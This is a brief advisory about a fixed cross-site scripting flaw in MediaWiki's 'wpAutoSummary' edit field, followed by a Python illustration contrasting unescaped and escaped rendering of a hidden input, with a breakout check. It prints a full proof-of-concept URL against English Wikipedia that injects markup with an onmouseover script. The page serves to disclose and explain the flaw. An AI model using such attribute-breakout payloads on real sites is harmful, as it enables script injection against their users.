MediaWiki/Parser43
From Nick Jenkins
XSS: arbitrary JavaScript execution and HTML insertion.
The problem is the "wpAutoSummary" field.
Proof-of-Concept, on the English Wikipedia: http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a (you will need to scroll down the page to see it). (Note: this is now fixed.)
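The bug class behind this report is an attribute-context injection: a submitted value is written back into a quoted HTML attribute without escaping, so a value containing `"` closes the attribute and anything after it becomes new markup. The following is an added illustration, not MediaWiki's code and not part of the original report. It assumes (an assumption, not stated on the page) that the summary is re-emitted as the `value` of a hidden `<input name="wpAutoSummary">` in the edit form, and it uses a constructed, script-free breakout string to show the vulnerable rendering beside the escaped one and a simple check that flags the breakout.

```python
import html
import re

# Constructed sample input: a summary containing a double quote followed by
# a tag. It is benign (no script) and is not the page's proof-of-concept.
BREAKOUT_SUMMARY = 'fix typo" /><b>injected</b>'


def render_hidden_field_unescaped(name: str, value: str) -> str:
    """Vulnerable form: the raw value is pasted into a quoted attribute.

    Any double quote in `value` terminates the attribute early, and the rest
    of the string is parsed as markup by the browser.
    """
    return f'<input type="hidden" name="{name}" value="{value}" />'


def render_hidden_field_escaped(name: str, value: str) -> str:
    """Hardened form: & < > " ' are entity-encoded before insertion, so the
    value can never leave the attribute regardless of its content."""
    return f'<input type="hidden" name="{name}" value="{html.escape(value, quote=True)}" />'


TAG_RE = re.compile(r"<[^>]+>")
VALUE_RE = re.compile(r'value="([^"]*)"')


def count_tags(markup: str) -> int:
    """Number of tags a naive scanner sees in the rendered fragment."""
    return len(TAG_RE.findall(markup))


def attribute_breakout(markup: str) -> bool:
    """A rendered hidden input should be exactly one tag; anything more means
    the value escaped its attribute and became markup of its own."""
    return count_tags(markup) != 1


def recovered_value(markup: str) -> str:
    """What a browser would submit back: the decoded content of the value
    attribute. For the escaped rendering this round-trips the original text;
    for the vulnerable one the text is truncated at the first quote."""
    match = VALUE_RE.search(markup)
    return html.unescape(match.group(1)) if match else ""


if __name__ == "__main__":
    for label, render in (("unescaped", render_hidden_field_unescaped),
                          ("escaped", render_hidden_field_escaped)):
        markup = render("wpAutoSummary", BREAKOUT_SUMMARY)
        print(f"{label}: breakout={attribute_breakout(markup)} -> {markup}")
```

The escaped rendering both neutralises the breakout and preserves the user's text intact, which is the behaviour a fix for this field needs: escaping is applied at the point where the value enters HTML, not by filtering the input.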